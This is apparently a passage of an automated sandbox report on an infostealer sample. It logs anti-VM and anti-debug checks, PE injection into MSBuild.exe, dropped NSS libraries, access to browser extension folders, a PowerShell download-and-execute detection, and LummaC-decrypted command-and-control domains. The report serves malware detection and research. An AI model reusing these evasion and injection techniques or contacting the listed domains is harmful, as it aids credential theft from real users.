Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBAAFIDGDA.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DGDBKFBAKF.exe PID: 7880, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory allocated: 1860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory allocated: 3320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory allocated: 5320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory allocated: 3160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory allocated: 5160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory allocated: 1E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory allocated: 38C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory allocated: 3740000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

API coverage: 6.3 %

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe TID: 7272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe TID: 7900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7944	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7952	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00401110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_004099F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	1_2_004156C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040C2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00415EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	1_2_00414F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00409D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	1_2_00415A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_0040AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040B4B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040B4B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00413C66 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00413C66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004138AA GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_004138AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00401157 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00401157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041355A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_0041355A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004091E3 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_004091E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409E5F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_00409E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0040A6A6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_0040A6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00408EB5 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_00408EB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00412F4A wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	6_2_00412F4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00409706 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_00409706

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

1_2_004153C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0040FDA0 GetSystemInfo,wsprintfA,

1_2_0040FDA0

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, gfn1go[1].exe.1.dr	Binary or memory string: S7hEhQEMUyK2nV1tCWv
Source: jen1hg[1].exe.1.dr	Binary or memory string: vmcihW1Oznu0Qe0UDAjh
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: gfn1go[1].exe.1.dr	Binary or memory string: HVMCIK0u2FWt4eH4AxA
Source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, gfn1go[1].exe.1.dr	Binary or memory string: QGXs8qEMUZEVqKUAAURg
Source: DGDBKFBAKF.exe, 00000007.00000000.2132619976.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp, gfn1go[1].exe.1.dr	Binary or memory string: kDKjFkE8j8wxboYW6psS7hEhQEMUyK2nV1tCWvEREyKrExxTqlqqEIOftGYC89FEccyyWAuuJ2pX
Source: gfn1go[1].exe.1.dr	Binary or memory string: HvMci1EIfwkyvh4lbQvX
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(}
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001038000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001093000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2273918492.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2273918492.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001038000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001093000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarey

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node			graph_1-92821
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_0041D12F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00402000 VirtualProtect 00000000,00000004,00000100,?

1_2_00402000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

1_2_00417A40

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004176E0 mov eax, dword ptr fs:[00000030h]		1_2_004176E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004151E1 mov eax, dword ptr fs:[00000030h]		6_2_004151E1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,RtlAllocateHeap,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,

1_2_00402000

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041ECC8 SetUnhandledExceptionFilter,	1_2_0041ECC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0041D12F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0041CAF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C59B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6C59B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C59B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C59B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C74AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6C74AC62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041BDA8 SetUnhandledExceptionFilter,	6_2_0041BDA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041A20F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0041A20F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_00419BD5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00419BD5

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 1lKbb2hF7fYToopfpmEvlyRN.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DBAAFIDGDA.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7828, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

1_2_0040ED80

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DBAAFIDGDA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\DGDBKFBAKF.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000052C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
